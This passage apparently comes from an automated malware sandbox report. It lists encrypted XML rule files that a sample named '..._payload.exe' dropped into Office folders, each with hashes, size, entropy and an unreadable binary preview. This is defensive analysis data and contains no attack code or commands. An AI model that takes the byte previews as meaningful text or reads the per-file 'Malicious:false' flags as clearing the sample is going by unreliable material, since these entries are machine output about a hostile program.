                                                                                                                          Preview:<?xml......\...x?b.>.d.M]fwJ..o.t....1...S....M._L[<..'..7K....;.0..^aIj#..WH...>.mV.4..#C...}.&.!>.?.....nV.D....:.`s?&..`!!.h...=#.Z..QCX... ...fy..f.m7..w.......&ZD..S....5..>...I%..bP...@.....zQuq.zlL...8[1*.||. ^.j.C..:.\p..jJ....rDw...Vy%....Q.....Tx./.....9...|5.e.H.F.T.s..g.\.vA....Bi.v...:..}.....V.I......."lN..f..........-x..........#0...].y.p..0h.Z.....pH.[.....t.S.-6x....U.....wP ...c...wD..Q.'f..N"]b.e.......$.Y....5S.pc.qi.DC..8...d.?..;.9Xq{Wf...;..q.(4..9,.b...@...S.._.q_..t.a.>b.....}.....`g3.7,...{.n....8.!?I#`...+.h."......i.8.M....x.@C.m.!3..k....&...\erf3..B....u,=.#....~......dw.<.........](.....[:.T......J.C.P.2%.".... Sw...92.KGw.,.\Z..n.N..`..j.1n.g......~/.?T6.../..7.....2KF...0.>zz.........D...|.......#........u9.~y!.l.4.4...}.,....U..`...r......h...8[%.R..swfe.S..a..^O.........c.....B*....<...k\(.8?]..z..\/6.*.N....-sQ.X...........-...E.k...Pc./x.l.Z...;...........@.n...Po>Bu.!.Y..y.g.v.....d....4O.#/.].hv......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.866528502711915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mQ3bGt4ccx4O2sfRSPuxHuo+TuooMA0ipZ1DbqOlehpJTNp73iOtJtT+GbD:jGw2CSPVTu5pucefp7iOtJtZD
                                                                                                                          MD5:2A9447BF8F1BC3B298F86F724C34F839
                                                                                                                          SHA1:A869DF09B973A7AC41AE8D1ECC706B45908A8CF1
                                                                                                                          SHA-256:27711EA0F9C78C9393F2A1F9043F55A337094F665D55EF1987B7B462AAB44AE9
                                                                                                                          SHA-512:1C959574141265D622D535A4684A69B38A9A204EBDF329013D935A437C54C1ADEB24D1D7AC7C46EF478F8CFF240BEDA9ACF56E3DC1168E8C9F0C24B9DDD01352
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...Q.7..S..Ow.IL.o..f.S..........},....]4..tV.C.1."p.Z....(..F..qh.....i.S......#.l.n%.......K.;.G......S.a0....v.^k....8.<2.s..`..N...Q}sS....F&....2..m.p..!L1r*=........t.B..Az.ZE;DY.*..K.....Js...?&..H.H*....?...O.+. P]W... ....I...........~.2J.../.nE{g..E.Q..!.P./..5.da.T..&P%.z..ny....Im.+X..m":.f.dc.....+.%..u.ZEW.>.S.....fC\n..Q.v..R..O.Dg....Q:.........P.MI.\.00y.C[..m.q.....%c/M&T..g'...A..........c....<.'.n..5swI...Q..p..7.N`g.....P. ..-.5........l`.fp+..D..].......;.5........m..?..2.H......$|..|."6.z..8.fh8.zHjE.U.0...V.T(...|.tVd.SzX_u..?fJ.j/.A.Q....z.w.fn...3M..~....}.......Mv"m............y5w..b..".P.....].]......i3,.Z..}...1.K.K.qT.>,..:.^......C'..2?..E..^L...h.....m|..LV6..Y...~....1.)..6.`.}...lm@j4q..}.]l.=Q..m?}.jg...^........./G..W}....g.;....!..KP..-...?|1W.E0.y..+iu..M...}...o...ns.y....E.8.h~..?.i..N6D.~......?..Y}n..D..J...'.....z.Q...zH../.4..!..8V..]..M...4.....gk.o0.A....3.....BXX.C..!1].b .;.....4-..{$....4

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.874681805917639
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:673KONMc5ub/COQKeHm939Dd81ASR3ifx5ZOroJD:2z5M/COQZgxyJ+xx
                                                                                                                          MD5:8FDCED30BFD69CFB95CCB191B00967C3
                                                                                                                          SHA1:1863129E04151516B3AC6FFBCB6D9F6FF69E1AFC
                                                                                                                          SHA-256:D328BBFCA78773B42B83DA1339EEFDD1A91A44FBD31542A211EB075EFD7FC7FD
                                                                                                                          SHA-512:3ACC5B87726CB1E1DF162AB298FBD66AEEDF1AEA14B78B065A0FADE9B47586CB6524C00FBE67317DBD3D201D5ABBEAF20E5DF956A2E2D22069458E6ECDED412D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.[C[p...=.t..<.?I..f.@.0............=.R...e.S...X......=.A2).z<.1C...b..k.k09#..sb..l"......5..S.#...HE..c...P."H...-R.!..+..T...L.oH.R........a.H...D..h..._.x..wd.&........].>/!.c@}.l...ll`."s.Y`.Pn.....~.&y6..FV..........W...X.9.}...=;G....x...%p6L...u.....wT./B.p........s.%l.y@q.z.4......L...]....-..D}.vBM..&.?./....f...v+I.!...15u.BA.D..+....DU!DS..8{).....H.E.....bCk?!5.%8FJ.m.;~..i...Q=9L.2>G...N..`......#I..A..4...`.t..F... ;M..y....Q`../.^..|-.3b'z..HW.......mM........1?...f....A8.b...(-....v.teT0.....9..`w.u.'. ......A.+.AU.OvNbl&uw.*......m.x.mFO!...c}..... .......K...V.!.D...1JX....B....].R4..........3....[......,....g.FksN...=...<...re.P...v.fA.|..gUCVP...x.N.......K}..............x.2.'.Z...{.a.....u../g.;.#.}.PK........;8(..x...@...E\o....&..XP:...B..Q.F...Qw.."v...............Ak.H.{.0FS.v.^.fp....kb.Ro...q#.............E.......Hcuyy.`&..=%_.jG#.E..M..Z.#..N.....-./.80.t.FI...U....*...hY..y.....fC..f.P..0...C.;6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1711
                                                                                                                          Entropy (8bit):7.889410622533579
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:XnEsvbISsOFGSropeUGfcIAr5rP1NCwVy7Za+zN12JmFbUjD:3EsvsOo4UGTAV1NBytb3bK
                                                                                                                          MD5:D69C8A41F149EBB80712C00710E9064F
                                                                                                                          SHA1:427648CCEAF01EE4AA0273EADE0028692F842367
                                                                                                                          SHA-256:054353E060875BB94318D469CE5B1B30F0E35A5E6617306985F6B19CCFF3F713
                                                                                                                          SHA-512:C61A44AE88F6F1E1788CC342F124F808601885EE086EFEF25F1BEAF90EDF1A4DE54833A6B7A92CA0126ACDF0523931EDB3AD6B961EF3D2045491AACD601DCF56
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.%^.._........~K..7....r.~..n.f. O.3_..A..:M..h....(UkF...A..Z..a.....7.....U.df....dm....|...t..k...:r.@......;..n).b..o..}..b..jWh..$..Cn.+.X....!.j....'...W7...........9..e/.2.vDet.Q..... ~!......`u...Jd.Q.Q.Q.S...'..!...K4J...g..zri&3B.{....n..x...Lo...?....[.c....T........e.....X.!......^z..O.[.z..X.ZpO"......^...........E!...............4M...^....zi...A0=...........z+.}...p.....~...6...(y. .?......${U.j...;.v.&,fW..H.k...rq.4..Z.g.4C.4._6..U.......}..Kv^z.bD/.r..v..h.#i....]9ZM........O.B..E..Z...4..T.....E....u.P"i.....0..P.W../.e>.9T.1.p&"".b1..8..Z.....\...U.2....s.s..m....2%B.i..oT......#.....^I..3^O<...U,.w4.......*./..\.U...e..o.MHb.....y..o;...?4.V.\9.W)t.. ..{.X......\..9jB._...U".D..xl.-V..F.u..9...#......./J].#62p7...?.*\..d.SD6...O........[.F.:)...9sqF.......c.N'H.#h..z...&.........l..5..X..,&.~..A...'m....6.}..QC|..+B....uE.v..._".&..|3....I..5aw=@..K^.}.>.....+..!.0...........}..... .....>[q\_....hr..R...#.IJ....tz$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1748
                                                                                                                          Entropy (8bit):7.8749608826124495
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lENwEqOdKfKMB30S0eDdh60T/9IuuP1OkKlD:OuEVKfvvZH60b+uutOn
                                                                                                                          MD5:CD0DA32123E2DBA0D213043601534421
                                                                                                                          SHA1:8D612A6968805471B26AA150022FCD63E97DDC97
                                                                                                                          SHA-256:941FA8978E647D24D7F07977BE1F716D2B959E173126994730CEC880411F371E
                                                                                                                          SHA-512:E37FAF214238EC54DE18F7D05579359614C1D35782976613050E6F2605C95EE612ED61D4BCC941B696E7D1A1053D7922E2B791EA209FDDE34A51EAF2B51F7A70
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..+.0.5,........\."0?.o..v-.A.&U..))....9..f.O.&w.......`w[..`.sM~$..(...il[E'b..2|T...\....L.'........R..T..6.R...*_Dy7.....2.e[?wG...b.xU8YI.<....!0..f3si'.R...Fk(.....)...s.O.....5./iTnq.....!}!5L|..<.m`0.......$...g..`.....{[.....KE?u....%$..k...mq.&Vaf.y.UB'.[c....5MI.7.c..U.L.P....m..?'D...j.........._.a.D7S.Z/n.J./...|8N..*......G..rb.#...xm.V..EU..QZ.$.vH..E._<...$.h=.R............|{\....S...%....1..J.j..;.n.O...B,K.|..h..^#p.DA.H6...i.C0.9.2t`^..X.!....H.........@`.CXF.jB.N...f.yh...{.$..?KR.Q\.....<U.%.T/.5.k..5O...8...=%.o..8.D..J*nSC.X....}.@Jd..a...AU..G...mw.9..M61|.(....Q....ObF..;.<..loLVD..v.Y%,....Rc.W.Fk~f.%...x-G.Fc...BC....\.j...)....r..n.L...i;......z.[...st.....0~...L.6...|x...."{..~J....!S...pg..*..z:.a..6.DB.....K..RN..H...X...S......p{.Z...).KL..[...>.r..4+.....CRIG.6.e?..(....'.xe.Q(.SN..7E.d......j..J.`Q...J...-...p.P%..(v..(>_..3.........<F.wz..j.q7..cd{.0.6.9...g...O...`v...zZ....m.a..y.....q..).

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.897852790682169
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:oqhp3KaVjklJImW1LIzeVGBr+J2bJJ5dkidvg1+ZD:oAp3KYgW1LNGBi2D21+R
                                                                                                                          MD5:AB038A1073F75A5C4E8E3B88C40E6912
                                                                                                                          SHA1:B6418A63AC9715D43B7EC7B8C6D513C12820B6CA
                                                                                                                          SHA-256:D190D614EE923B7F4B7CB647CB6E9472F0F26524F659814373689EDA80DA7BEB
                                                                                                                          SHA-512:10E8875FA25CB9A42D5CEA7408902B5C33D807ED77BB896923B024E56609634C2724DDF1C7D03668324004B3C35C9B15379F58AE3CAA0CFC3A2F237DA9A5FA58
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlX......,Su<.V..N..Z. ..b....eV>..e...j.I....Z..dR.Se..+.4L..Y.n.>DqZ%....z...qg&n..(g.h8..Uu..3.`*...0...G....LG.2O[t.%`;..E.i."..ST.........2......V..B..M...!.G...".......h)[OH...R..`.. ..C.1.O..../\.*y....s9..*...f...yh..c.....{c.[ @..<={o......v....Rr...bt....#..I....%o..zh..v..!...=.k..x9..Hp...r.....9j.c]..s....c.B.....vS.[...*W..>;.O.Z...dT.Kv...>j...G...}.:.ob.T...*..Zt..Z.......[.F..0b..Kf0'....0E..H.ZV..(.hvB...vv6...*$-l.&H......M.a...oF|WS..$ Y.j.q.....84n..t^w.T w.....p..p... Ne..!V.8.k..6.D.u?.."...,..D.!}..A....M..`,pP...........!.....x..o..NI.....S.+wp.X8... .G(..;.[#4..9e.....(f.......-..l..m'. e....+....WM..)4.z.,....4G.=V.$.'..L....#..B..W.V.4.......d..c.#. .T&.R}.........)R.-.......rD,....F......b....!F..S....i83]M}2.K .....qX...<.=....E~..G....B.Oi..P|#.?0..v].(.v.g."C...x..&T$k..k...V......Hmo.;l.@.....\^.r3.8....qr..Q.....C...|.JS..y.A.o..p....#88,|.....SB....c..........kM.U.u..l.$.}.P..J7....'x.b....Y..|..%

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1770
                                                                                                                          Entropy (8bit):7.885927731905028
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2iHmf8BgBRyu4hkWNKGSljlmuwFQwgvnD:2mmf8G6RSljlmuvwgr
                                                                                                                          MD5:288F6AC236C2BBD9DFE5FC1021356808
                                                                                                                          SHA1:AE2C5811A34698BC43D05DC64F940DF9082A4DF8
                                                                                                                          SHA-256:67D46831AAF682A8FB1F20BB951A364DFFA120CAB27E798CBAF94BA3F21FBBC2
                                                                                                                          SHA-512:C7F4D4139943028D4683116E6C7F214E0DB561528D40B9F7392C55EA3EFFCED99840FBD678B8C22877005F08D8E1DAB53020E582FBB68326310DF4B27E107699
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....c..mm....n...H...~.+..0.m.s|...T}g......)?.c..G.... .z7q.~J>m.XI.....]..w..e...y......qj.F..i..x^.bz...d9..!>gC}...X,.=.\...G.2i.(!...ykL.n..}.i..%.....mh.'...Y..QP...vX.{N.)...a....J.%..u4D.@%.k./aN.$.(@.9....=.<./.1.l...LO.(.iFkl._^c..".ifm2t........~..vs...SU.oN......\.a.|..ci...2WN<........,X}.}!j7AHoy....? o.d.|..K.N..+..q......CQ.:p5..5........t.....~.......c....S.#L6.76 ..VN...g..r..;.I=...C...'/w.o+.s{..ro.T..w....:.".t....l.....)...,...)<d.-.....5...c..|.....W.dO?MkD....O...G.t.dE..]E....[..YK......}..7$....2...I.../1.....f...bh....."..p."~.M+.....~.y.2...q.W....:'#.H..[....X...T.~.4^...Q...=...|..].9..+.H....lR..C(...y..$v...$_*.P_..a..+IUX.g..%>.3.ow..[.iP..[&...._.2...H."e........|E...h.....0]z..K..Q;.....b.9~M.9r#*1F...2...l..im:.$.[NXq._....E...1..l,G...bC{J/U....&F.JU.W.b>1.+>yd...8....I......(.7.L.>.16.F..".6j...:.K6A.|zK..I4...6i...Z.'9`..b.w!5..1>...G.K.......~.<...%#0.....t"...>%..0..... w.....@+O#.rc..{.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1715
                                                                                                                          Entropy (8bit):7.888060502291076
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0vsk7o6ISbLS3i2tBVs3vyk1/ncwJTFcum8D:rku+O33Ds/yW7u4
                                                                                                                          MD5:5E246BB8E4F7681BAAB5D4CA516ABFC9
                                                                                                                          SHA1:93273165C5E141B3C5F3F8F71A62517A451E82A4
                                                                                                                          SHA-256:B95028CC6A465724D4531DCB85F7C01744A0ACC4DAA359B180D57DCCD3529DA2
                                                                                                                          SHA-512:C65E830ABFF54F883EC1C85F178F3C6BD18DE69B79145FBEA6C22DB7E6A7F970B19ED21D92013AF1C76529242C8C9F2403F92724123404C42C89BE7F2A193811
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml._|.8.....g..C.(l..&.......&.g...O..C...e.... q+...n..W...W.(q..g...........%=N.H.".2.5G..U..G..Z..1.+..s...y...c.m...(.ki?..........%.E.c*.k?=..n.y...a....T........'......W.h..Z......|...2..F.s&C.4,%.6.sq.....7.B..j.....f.........M......@...c&t...*..l..I........}{.J.jt.....3.x./t^.~q.8'Y.im7.6....U."W...)..>r...V.......8R_.K.E....PNj..l.....<8..9#......h.I...g.........q.S..e..}<..!....}.d..:K..1}%iM8....).-L...w..'1>......a......n...!y.^.....[.4...X..v...)*R.X.J.+..c....W.$...$..........Q.x6.o.Kx..0B.......W".2r.r(..1*......0.T....G..3.......#..tW..!D..b...dw..Ec.....3.[^k1.nG.:S.....%....&.....2....X...79.!.....[L...J..jI.`.. .$!v....#.s~..nZ}A.3..cs........{.f......E.o........o..._..<.mb}.......C...l1..k..A...c...6Z...J.{.u.*.z[{..e...2.4.*6..@.....*..2eH.}WP+..M.~..>..Vs.5.e@.y..g.F..P<..u..8.9e..x".!..`-... .......*.\..?...Z<...*ti.w.....8o .d.G..c/.....{..F|.e..,..w.....3.f.|"....$c.V.go..*].\.5g......}..l...W.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1752
                                                                                                                          Entropy (8bit):7.875934097415275
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:XJCaVgtefPLMeIpx+Gep2z19I/Au32Yazt030uSKwyQ3AD:rOwfPLMfpMOoYq2Yazt030uzyc
                                                                                                                          MD5:7B3B4218EC29466A441B0B5A10EADB0E
                                                                                                                          SHA1:04E547EEB7921E534E1CAF19DC8F82A73AF4E921
                                                                                                                          SHA-256:6430B6C9C29E566A26D6D883CB1AFC0AC669030224E29824112C1C4C217A2B57
                                                                                                                          SHA-512:83B8FFB66004BB7E8775AE2E34FDE7CBEF39D2645B2DF10CA7AEE899F26665813B99CEA9D5D84D12352065339FA6BF4E578FD777B3835B86121C9234226C42E6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..@....=OD.O{.t.,...I.....V..r..Kp..&..U........."..C..l.N.E..#...#....e.iBO.\n}y..Zt..z.*i.b.L..p................Z.zM..q...,I...Y..<...B..V.W.....4H.......u...........W...~.T.N......&Y.8r"....N../.:l......i@-........1/.c..{...K.}n....".Z...\..4....d.o6..$7.z. .......X.9......Vp....U..B{%m..b..y.7*..1x].y...$.i.\.`.DO|....F... R....h..2j..Z.z.m]...M..?..!.=st...L.......{W.x.....5.>D.{..K..m.l......."..YDf.!.P..d..,m.+.............S.........Z....%Q}m.8...M...!.F..u...&..N...w...eL..].-..p##&.x.8..V.3..V.HT....U;.1.:......U..:.y0...S@.,.)l....E..r.W.)...i?.l...X....#...@..F.F ..o.,w......d..Y..&..8K.hJ.d......c..._.>J.C......?...^...~......w...i....t..f.....".....19:z<.B.=z.{"k.B.......y......T..B"py....^,y.....`.I...P.g...P...+..../.t.....V 9|..q.Qe....l}..]}...i.Q.....S...l..d.."..bN.|.n..e...qY.k..W.."|.......6.r..[*.jw.o|.FY..WR.<..v..$%Q.-..R.F.8c....y.............5T..8.X8@.j)...[.;..2.......c.`b.../.~.J."1.m.G..S.....-.Y..;.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.877381945994786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OGgcpVlo/4bEWt6rltB5mNRWP6hwN03QqrW/ABsCqD:Ol/44eqJ0NRWSqqgaRi
                                                                                                                          MD5:B0A1D220A723A7E391265707287EA2C5
                                                                                                                          SHA1:EE533197E54F637F43FFEAF22E2C50E0C33E5952
                                                                                                                          SHA-256:AEE7D5EA7B7036E2874F326CECEFBDE40EDF21B976FAB5DF556FB86A30AC03FB
                                                                                                                          SHA-512:39F5F33DEBF5CA3A049915F1E4C37530456E0BCCB4DECA2B16ABFB88202D0C99D36CF99146AED7EE2EF52131419F403870EED826C783452E07805DAAE4024D15
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...p=FC....B....{.......b.......5&&1.{. ..Y....?.'d.]....?[....F].@z..7=..?.$..o,...'.D.uG..+L...(..)3.d.U"..R3A.8.H..[...C`k..H@.P.S.eu.rBz...M.?..7..Ba#.zM.E.h...H....\Q-......\....zv)|..X.#..$.m..@.sdqx..!K8./.]G....9.}...xn..+.]\....6"\..".....H..E..Y#...7. o.p5.dB......7.........*...?=...k._.....i....Pn..4;o.G....1.....B{....k.v...LfC_mbf...pA.`.,.....2.)..;.1w...M....$~Tm::....g.}.........j:...F.d..|t.tY.BV8.*t^.J..J.c5r.N..F...v...gE...t.A....SEWU...C...c...+p....H,.x.~..S....C..H.yQE.dg.A;.eU.M....s..1yV.@.cL?......mY.A...=.Q.*3....2...=7.m.q^..M.KA|Z(....avL..q.5.7...Gh}..vq.....y.[......%..s.....U.0#J-$?...3..Vul0.$....8.f.~...h.....P..b..m.7H..tt......K....G...z$P,~...o),..@.E..A..[|m1.d...{..mt.Y.......S....a@..o ...#7......e.ox.Dk..)....n.;.8{?K..H.9..c..o@om...&DZ*o..<".p..c.L.....#.[.0...............c.x.g.I.....@.Ch...R7...n*to(...=.i..m.d..Q.....-.A..Y|..U...b......].........Q.f@...m.S48..~..'.~.%....<..Q.=2mo..n...F....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1775
                                                                                                                          Entropy (8bit):7.874105283677597
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zeZR9stgXQddKBtXkcThX0Wd6raaF+5zh0Qz2qDaIcvYSD:zeZR9egXgA7XB6FaadQzDuIcp
                                                                                                                          MD5:863563F498237C49594E0FA1FE37ED3C
                                                                                                                          SHA1:1B0FD5A6F39984E33CD3A4DF863C03CA57BE9ADC
                                                                                                                          SHA-256:F8CE81E7E3802BCF192A65F91DB95C46ED42CA5C4262608174800DCAFB5CE415
                                                                                                                          SHA-512:696DC09F8E3DA086DDE89539C99D5D423B4BF4728FC838FC2AB3F93D457A79BF28D7AD32199463FAD8058BA3189A500C0F8F4C2B11D46C6E6AED49A2A1F69276
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmle.4K...}..Z3...{...ML4uO/.{.$&...-..#....b......c3d.Ie.5..-...L.....8.?D....\S...u....QT.C".BL...x...ub..Y.).(. {$rs...sx.x.....Ey.KV.^.?X.&.]D..K.#......%.|..."V.M.+hb.:.&.DbQ_;...@5..e{.P.-c...c...).Ab?..F.7...U<Mbh S..S9D..r....1.ubY.*...lkH0.X...%/....$`a....ZU..Z....g .h.?.f\...$....X.h5+.kl.Z....Y..Y. T....|..n.@.. I-....6..f...6p........j.....TA.W~.0...p.Jx.I..wt.B..I..P..{*.....5CC|..._....fT.x........K.............R..p..E~...w..u.V.n{}.d......:.5.....p.J..l..o2.....[.;$.....5l.....i7..5nckR.:..0....^.la)..i..;u.D.L.....@C..GI...L.......su......Y"u.{.....q.\.[..4..CR4...G.G..Y:h'.|..-U.U.K......../...V.)1.e..[.+...Q..;.,\V\.W....s..7.1.T|...`J...a....D.(..."N..=..0...x...L%......1...<...h...h..2p>.....M..K..:.-.9..e..1i.h.{..}Y.iS../.-..N...R.u.......=....$$k......{>AO.Tx......./|c!.Q..]..\&.j......~.c(..ud.^..eI....T...U.s.M>..c}..M4f.~.Y..3tI.y..!Wi.b@.h<5.5_s.....je.`[..C..{..f.....Q0.1.....T....s..K...|.$.=..c

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1723
                                                                                                                          Entropy (8bit):7.886744774849851
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4GVfkG5n833qdfhYaWwLe1UPXHXyz0TQ7tD:fVfNaDt1UPX3ysMV
                                                                                                                          MD5:2F7C7DE7CC17B776D4EBD76050DDF0E5
                                                                                                                          SHA1:FFFA1A72C98505E5BFBD2CC89D6EDCBFB571965C
                                                                                                                          SHA-256:13A430CAAEFA8C4273D3FED7D4903C284E57A6F0F765C1367666D8C1BC525720
                                                                                                                          SHA-512:B2E1D752CD14CFEBFA934F0595C21C4C42D14A692D10355A5ABFBBF2EA4727454620A5064D8F7340F08B15133A513FCE31561BCA9C7BB5C98A579290AEE5BE59
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.{Bj..M...c6C.<..tvw....{.uD..v.2..BSS......a..9...>...e..2..7w.>..>...o.W.K.._M.h..7..xW....z..h7.;>p^.3.l...7....i4......L..W..D.'.n..i.eX...y.).g.';..mU...Q...q.........A...>..o_..`....%n*.....qa.~.Ht.W........E....,.(..U!......<...N.....*....W.}o..Jn..pW...R.......|.....NP.&|=...^b..f.......;{.....j....S.:...Jr}.....zG..h.........&i....0.w....?tn!.V..:......v..W....]...r..X..?7.........We3..\.t_.........&......{...5g/.......@'HSB53.<......9... .kg.....R..9...r.b@...L.3./....\u..gIm....U.B?.L..=.....5.1.ah.I.,.(..3.tykq8.cl)..O..UT..c.\.b._4hU.m.2..t.'ObghJde...#.0.L...Z!...*4Lk.....C|.Z1.&.~..M2..f.5..V+*(.....-......+.6..].....W9'...5w.I5..I.t.+.Z..=(...<.!'<..`>_,Z\n...."1a....+.G..#hD.T.}.?Q..1.....d..:S.U.sl.v...tr.u>...z2p..'...qH....*....u..M...c.WNM~...i.q......(...}.2Z/.....>cj.M.....r...J{.....D..\j.n.f I...&1...J.)".W..{[;.P.J1O.&.....DP7v....l..A..o&x`.e.GL:.Z6F..+.;.;[.^d...Y..S...........Pr.H.E........I.dg?.F

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1760
                                                                                                                          Entropy (8bit):7.900863980033926
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Q3ZGh3FUZ3kLw2zEQS76Wu+EQF0j4oti2D:Q3ZGh3utks2zEQS76WbEQFkn
                                                                                                                          MD5:393CE660711B6A539162E2D3E14038E4
                                                                                                                          SHA1:C48CBA96DF9FDA868A06FE244BBAA80C90E16633
                                                                                                                          SHA-256:0504F095C1FA3A8BB476849DF7F944F513EC4B306C31F271FCAFAD598BED71A3
                                                                                                                          SHA-512:CFF402C7E8DFFE2D8F94BAA7D9DE16471DDEEAE65D782470685A2AE31A6B8A857A6A3D7C21CE1854F14D8EA4C09B53E650782FFF5801FDEE1E1E7FDF756DC498
                                                                                                                          Malicious:false
